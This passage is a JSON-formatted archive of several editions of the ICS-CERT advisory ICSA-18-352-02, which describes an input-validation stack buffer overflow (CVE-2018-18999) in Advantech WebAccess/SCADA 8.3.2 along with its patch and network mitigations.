"Industrial Control Systems Cyber Emergency Response Team", "references": ["/forms/feedback?helpful=no&document=ICSA-18-352-02: Advantech WebAccess/SCADA&trackingNumber=&url=https://www.us-cert.gov/ics/advisories/ICSA-18-352-02&site_name=US-CERT", "https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plug-information", "https://www.dhs.gov/privacy-policy", "https://www.dhs.gov/privacy-policy", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18999", "https://www.whitehouse.gov/", "https://cwe.mitre.org/data/definitions/20.html", "https://twitter.com/share?url=https%3A%2F%2Fwww.us-cert.gov%2Fics%2Fadvisories%2FICSA-18-352-02", "https://www.dhs.gov/plain-writing-dhs", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fwww.us-cert.gov%2Fics%2Fadvisories%2FICSA-18-352-02", "https://www.oig.dhs.gov/", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "/forms/feedback?helpful=somewhat&document=ICSA-18-352-02: Advantech WebAccess/SCADA&trackingNumber=&url=https://www.us-cert.gov/ics/advisories/ICSA-18-352-02&site_name=US-CERT", "https://www.dhs.gov/freedom-information-act-foia", "http://twitter.com/icscert", "https://www.dhs.gov", "https://www.usa.gov/", "/forms/feedback?helpful=yes&document=ICSA-18-352-02: Advantech WebAccess/SCADA&trackingNumber=&url=https://www.us-cert.gov/ics/advisories/ICSA-18-352-02&site_name=US-CERT", "https://www.dhs.gov/", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.us-cert.gov%2Fics%2Fadvisories%2FICSA-18-352-02", "http://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-S9MJV&Doc_Source=Download"], "cvelist": ["CVE-2018-18999"], "immutableFields": [], "lastseen": "2019-07-17T13:56:58", "history": [], "viewCount": 21, "enchantments": {"dependencies": {"modified": "2019-07-17T13:56:58", "references": [{"idList": ["CVE-2018-18999"], "type": "cve"}]}, "score": {"modified": "2019-07-17T13:56:58", "value": 4.5, "vector": "NONE"}}, "objectVersion": "1.4"}, "lastseen": "2019-07-17T13:56:58", "differentElements": ["description"], "edition": 2}, {"bulletin": {"id": "ICSA-18-352-02", "hash": "cac57e9eb5ff59ca7a4834cb3af9c00238ad8d3e7617a890cb55e4cf15509a77", "type": "ics", "bulletinFamily": "info", "title": "Advantech WebAccess/SCADA", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 7.3**\n\n * **ATTENTION:** Exploitable remotely/low skill level to exploit\n * **Vendor: **Advantech\n * **Equipment:** WebAccess/SCADA\n * **Vulnerability:** Improper Input Validation\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of this vulnerability could cause a stack buffer overflow condition.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following versions of WebAccess/SCADA, a SCADA software platform, are affected:\n\n * WebAccess/SCADA Version 8.3.2 installed on Windows 2008 R2 SP1.\n\n### 3.2 VULNERABILITY OVERVIEW\n\n**3.2.1 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)**\n\nLack of proper validation of user supplied input may allow an attacker to cause the overflow of a buffer on the stack. \n\n[CVE-2018-18999](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18999>) has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS: **Critical Manufacturing, Energy, Water and Wastewater Systems\n * **COUNTRIES/AREAS DEPLOYED: **East Asia, United States, Europe\n * **COMPANY HEADQUARTERS LOCATION:** Taiwan\n\n### 3.4 RESEARCHER\n\nJacob Baines of Tenable Network Security reported this vulnerability to NCCIC.\n\n## 4\\. MITIGATIONS\n\nAdvantech has released Version 8.3.4 of WebAccess/SCADA to address the reported vulnerability. Users can download the latest version of WebAccess/SCADA at the following location (registration required):\n\n[http://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-S9MJV&amp;Doc_Source=Download](<http://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-S9MJV&Doc_Source=Download>)\n\nNCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nNCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nNCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available on the ICS-CERT website in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.\n\nNo known public exploits specifically target this vulnerability.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the NCCIC at: \n \nEmail: [NCCICCUSTOMERSERVICE@hq.dhs.gov](<mailto:NCCICCUSTOMERSERVICE@hq.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: http://ics-cert.us-cert.gov \nor incident reporting: https://ics-cert.us-cert.gov/Report-Incident?\n\nThe NCCIC continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\nWas this document helpful? Yes | Somewhat | No\n", "published": "2018-12-18T00:00:00", "modified": "2018-12-18T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://www.us-cert.gov//ics/advisories/ICSA-18-352-02", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["/forms/feedback?helpful=no&document=ICSA-18-352-02: Advantech WebAccess/SCADA&trackingNumber=&url=https://www.us-cert.gov/ics/advisories/ICSA-18-352-02&site_name=US-CERT", "https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plug-information", "https://www.dhs.gov/privacy-policy", "https://www.dhs.gov/privacy-policy", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18999", "https://www.whitehouse.gov/", "https://cwe.mitre.org/data/definitions/20.html", "https://twitter.com/share?url=https%3A%2F%2Fwww.us-cert.gov%2Fics%2Fadvisories%2FICSA-18-352-02", "https://www.dhs.gov/plain-writing-dhs", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fwww.us-cert.gov%2Fics%2Fadvisories%2FICSA-18-352-02", "https://www.oig.dhs.gov/", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "/forms/feedback?helpful=somewhat&document=ICSA-18-352-02: Advantech WebAccess/SCADA&trackingNumber=&url=https://www.us-cert.gov/ics/advisories/ICSA-18-352-02&site_name=US-CERT", "https://www.dhs.gov/freedom-information-act-foia", "http://twitter.com/icscert", "https://www.dhs.gov", "https://www.usa.gov/", "/forms/feedback?helpful=yes&document=ICSA-18-352-02: Advantech WebAccess/SCADA&trackingNumber=&url=https://www.us-cert.gov/ics/advisories/ICSA-18-352-02&site_name=US-CERT", "https://www.dhs.gov/", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.us-cert.gov%2Fics%2Fadvisories%2FICSA-18-352-02", "http://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-S9MJV&Doc_Source=Download"], "cvelist": ["CVE-2018-18999"], "immutableFields": [], "lastseen": "2019-07-19T15:42:36", "history": [], "viewCount": 21, "enchantments": {"dependencies": {"modified": "2019-07-19T15:42:36", "references": [{"idList": ["CVE-2018-18999"], "type": "cve"}]}, "score": {"modified": "2019-07-19T15:42:36", "value": 6.0, "vector": "NONE"}}, "objectVersion": "1.4"}, "lastseen": "2019-07-19T15:42:36", "differentElements": ["description", "references"], "edition": 3}, {"bulletin": {"id": "ICSA-18-352-02", "hash": "e0af035f52ebe9007a781af6fd5ae7497d036b5340317c8d375a6aee5be94941", "type": "ics", "bulletinFamily": "info", "title": "Advantech WebAccess/SCADA", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 7.3**\n\n * **ATTENTION:** Exploitable remotely/low skill level to exploit\n * **Vendor: **Advantech\n * **Equipment:** WebAccess/SCADA\n * **Vulnerability:** Improper Input Validation\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of this vulnerability could cause a stack buffer overflow condition.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following versions of WebAccess/SCADA, a SCADA software platform, are affected:\n\n * WebAccess/SCADA Version 8.3.2 installed on Windows 2008 R2 SP1.\n\n### 3.2 VULNERABILITY OVERVIEW\n\n**3.2.1 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)**\n\nLack of proper validation of user supplied input may allow an attacker to cause the overflow of a buffer on the stack. \n\n[CVE-2018-18999](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18999>) has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS: **Critical Manufacturing, Energy, Water and Wastewater Systems\n * **COUNTRIES/AREAS DEPLOYED: **East Asia, United States, Europe\n * **COMPANY HEADQUARTERS LOCATION:** Taiwan\n\n### 3.4 RESEARCHER\n\nJacob Baines of Tenable Network Security reported this vulnerability to NCCIC.\n\n## 4\\. MITIGATIONS\n\nAdvantech has released Version 8.3.4 of WebAccess/SCADA to address the reported vulnerability. Users can download the latest version of WebAccess/SCADA at the following location (registration required):\n\n[http://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-S9MJV&amp;Doc_Source=Download](<http://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-S9MJV&Doc_Source=Download>)\n\nNCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nNCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nNCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available on the ICS-CERT website in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.\n\nNo known public exploits specifically target this vulnerability.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://www.us-cert.gov/ics \nor incident reporting: https://www.us-cert.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\nWas this document helpful? Yes | Somewhat | No\n", "published": "2018-12-18T00:00:00", "modified": "2018-12-18T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://www.us-cert.gov//ics/advisories/ICSA-18-352-02", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["/forms/feedback?helpful=somewhat&document=ICSA-18-352-02: Advantech WebAccess/SCADA&trackingNumber=&url=https://us-cert.cisa.gov/ics/advisories/ICSA-18-352-02&site_name=US-CERT", "https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plug-information", "https://www.dhs.gov/privacy-policy", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18999", "https://www.whitehouse.gov/", "https://cwe.mitre.org/data/definitions/20.html", "/forms/feedback?helpful=yes&document=ICSA-18-352-02: Advantech WebAccess/SCADA&trackingNumber=&url=https://us-cert.cisa.gov/ics/advisories/ICSA-18-352-02&site_name=US-CERT", "https://www.dhs.gov/plain-writing-dhs", "https://www.oig.dhs.gov/", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "https://twitter.com/share?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-352-02", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-352-02", "https://www.dhs.gov/freedom-information-act-foia", "http://twitter.com/icscert", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-352-02", "https://www.dhs.gov", "https://www.usa.gov/", "https://www.dhs.gov/", "/forms/feedback?helpful=no&document=ICSA-18-352-02: Advantech WebAccess/SCADA&trackingNumber=&url=https://us-cert.cisa.gov/ics/advisories/ICSA-18-352-02&site_name=US-CERT", "http://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-S9MJV&Doc_Source=Download"], "cvelist": ["CVE-2018-18999"], "immutableFields": [], "lastseen": "2020-07-07T17:27:08", "history": [], "viewCount": 21, "enchantments": {"dependencies": {"modified": "2020-07-07T17:27:08", "references": [{"idList": ["CVE-2018-18999"], "type": "cve"}], "rev": 2}, "score": {"modified": "2020-07-07T17:27:08", "rev": 2, "value": 5.9, "vector": "NONE"}}, "objectVersion": "1.4"}, "lastseen": "2020-07-07T17:27:08", "differentElements": ["description", "references"], "edition": 4}, {"bulletin": {"id": "ICSA-18-352-02", "hash": "975cfec34af6754d2c2472d3c1c54d036b3e0d78aba698cb03b7445f6b5fa91b", "type": "ics", "bulletinFamily": "info", "title": "Advantech WebAccess/SCADA", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 7.3**\n\n * **ATTENTION:** Exploitable remotely/low skill level to exploit\n * **Vendor: **Advantech\n * **Equipment:** WebAccess/SCADA\n * **Vulnerability:** Improper Input Validation\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of this vulnerability could cause a stack buffer overflow condition.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following versions of WebAccess/SCADA, a SCADA software platform, are affected:\n\n * WebAccess/SCADA Version 8.3.2 installed on Windows 2008 R2 SP1.\n\n### 3.2 VULNERABILITY OVERVIEW\n\n**3.2.1 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)**\n\nLack of proper validation of user supplied input may allow an attacker to cause the overflow of a buffer on the stack. \n\n[CVE-2018-18999](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18999>) has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS: **Critical Manufacturing, Energy, Water and Wastewater Systems\n * **COUNTRIES/AREAS DEPLOYED: **East Asia, United States, Europe\n * **COMPANY HEADQUARTERS LOCATION:** Taiwan\n\n### 3.4 RESEARCHER\n\nJacob Baines of Tenable Network Security reported this vulnerability to NCCIC.\n\n## 4\\. MITIGATIONS\n\nAdvantech has released Version 8.3.4 of WebAccess/SCADA to address the reported vulnerability. Users can download the latest version of WebAccess/SCADA at the following location (registration required):\n\n[http://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-S9MJV&amp;Doc_Source=Download](<http://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-S9MJV&Doc_Source=Download>)\n\nNCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nNCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nNCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available on the ICS-CERT website in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.\n\nNo known public exploits specifically target this vulnerability.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSA-18-352-02>); we'd welcome your feedback.\n", "published": "2018-12-18T00:00:00", "modified": "2018-12-18T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://www.us-cert.gov//ics/advisories/ICSA-18-352-02", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSA-18-352-02", "https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plug-information", "https://www.dhs.gov/privacy-policy", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18999", "https://www.whitehouse.gov/", "https://cwe.mitre.org/data/definitions/20.html", "https://www.dhs.gov/plain-writing-dhs", "https://www.oig.dhs.gov/", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "https://twitter.com/share?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-352-02", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-352-02", "https://www.dhs.gov/freedom-information-act-foia", "http://twitter.com/icscert", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-352-02", "https://www.dhs.gov", "https://www.usa.gov/", "https://www.dhs.gov/", "http://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-S9MJV&Doc_Source=Download"], "cvelist": ["CVE-2018-18999"], "immutableFields": [], "lastseen": "2020-12-18T03:22:26", "history": [], "viewCount": 21, "enchantments": {"dependencies": {"modified": "2020-12-18T03:22:26", "references": [{"idList": ["CVE-2018-18999"], "type": "cve"}], "rev": 2}, "score": {"modified": "2020-12-18T03:22:26", "rev": 2, "value": 5.8, "vector": "NONE"}}, "objectVersion": "1.4"}, "lastseen": "2020-12-18T03:22:26", "differentElements": ["description", "references"], "edition": 5}, {"bulletin": {"id": "ICSA-18-352-02", "hash": "ace3280e698ca03e55d86dbb9bca2bc1", "type": "ics", "bulletinFamily": "info", "title": "Advantech WebAccess/SCADA", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 7.3**\n\n * **ATTENTION:** Exploitable remotely/low skill level to exploit\n * **Vendor: **Advantech\n * **Equipment:** WebAccess/SCADA\n * **Vulnerability:** Improper Input Validation\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of this vulnerability could cause a stack buffer overflow condition.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following versions of WebAccess/SCADA, a SCADA software platform, are affected:\n\n * WebAccess/SCADA Version 8.3.2 installed on Windows 2008 R2 SP1.\n\n### 3.2 VULNERABILITY OVERVIEW\n\n**3.2.1 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)**\n\nLack of proper validation of user supplied input may allow an attacker to cause the overflow of a buffer on the stack. \n\n[CVE-2018-18999](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18999>) has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS: **Critical Manufacturing, Energy, Water and Wastewater Systems\n * **COUNTRIES/AREAS DEPLOYED: **East Asia, United States, Europe\n * **COMPANY HEADQUARTERS LOCATION:** Taiwan\n\n### 3.4 RESEARCHER\n\nJacob Baines of Tenable Network Security reported this vulnerability to NCCIC.\n\n## 4\\. MITIGATIONS\n\nAdvantech has released Version 8.3.4 of WebAccess/SCADA to address the reported vulnerability. Users can download the latest version of WebAccess/SCADA at the following location (registration required):\n\n[http://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-S9MJV&amp;Doc_Source=Download](<http://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-S9MJV&Doc_Source=Download>)\n\nNCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nNCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nNCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available on the ICS-CERT website in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.\n\nNo known public exploits specifically target this vulnerability.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSA-18-352-02>); we'd welcome your feedback.\n", "published": "2018-12-18T00:00:00", "modified": "2018-12-18T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://www.us-cert.gov//ics/advisories/ICSA-18-352-02", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plug-information", "https://www.dhs.gov/privacy-policy", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18999", "https://www.whitehouse.gov/", "https://cwe.mitre.org/data/definitions/20.html", "https://www.dhs.gov/plain-writing-dhs", "https://www.oig.dhs.gov/", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "https://twitter.com/share?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-352-02", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-352-02", "https://www.dhs.gov/freedom-information-act-foia", "http://twitter.com/icscert", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-352-02", "https://www.dhs.gov", "https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSA-18-352-02", "https://www.usa.gov/", "https://www.dhs.gov/", "http://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-S9MJV&Doc_Source=Download"], "cvelist": ["CVE-2018-18999"], "immutableFields": [], "lastseen": "2021-02-24T09:28:33", "history": [], "viewCount": 21, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-18999"]}], "modified": "2021-02-24T09:28:33", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-02-24T09:28:33", "rev": 2}}, "objectVersion": "1.4"}, "lastseen": "2021-02-24T09:28:33", "differentElements": ["href"], "edition": 6}, {"bulletin": {"id": "ICSA-18-352-02", "hash": "f148fd45355ee1324cd3dd8255f61f2a", "type": "ics", "bulletinFamily": "info", "title": "Advantech WebAccess/SCADA", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 7.3**\n\n * **ATTENTION:** Exploitable remotely/low skill level to exploit\n * **Vendor: **Advantech\n * **Equipment:** WebAccess/SCADA\n * **Vulnerability:** Improper Input Validation\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of this vulnerability could cause a stack buffer overflow condition.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following versions of WebAccess/SCADA, a SCADA software platform, are affected:\n\n * WebAccess/SCADA Version 8.3.2 installed on Windows 2008 R2 SP1.\n\n### 3.2 VULNERABILITY OVERVIEW\n\n**3.2.1 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)**\n\nLack of proper validation of user supplied input may allow an attacker to cause the overflow of a buffer on the stack. \n\n[CVE-2018-18999](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18999>) has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS: **Critical Manufacturing, Energy, Water and Wastewater Systems\n * **COUNTRIES/AREAS DEPLOYED: **East Asia, United States, Europe\n * **COMPANY HEADQUARTERS LOCATION:** Taiwan\n\n### 3.4 RESEARCHER\n\nJacob Baines of Tenable Network Security reported this vulnerability to NCCIC.\n\n## 4\\. MITIGATIONS\n\nAdvantech has released Version 8.3.4 of WebAccess/SCADA to address the reported vulnerability. Users can download the latest version of WebAccess/SCADA at the following location (registration required):\n\n[http://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-S9MJV&amp;Doc_Source=Download](<http://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-S9MJV&Doc_Source=Download>)\n\nNCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nNCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nNCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation 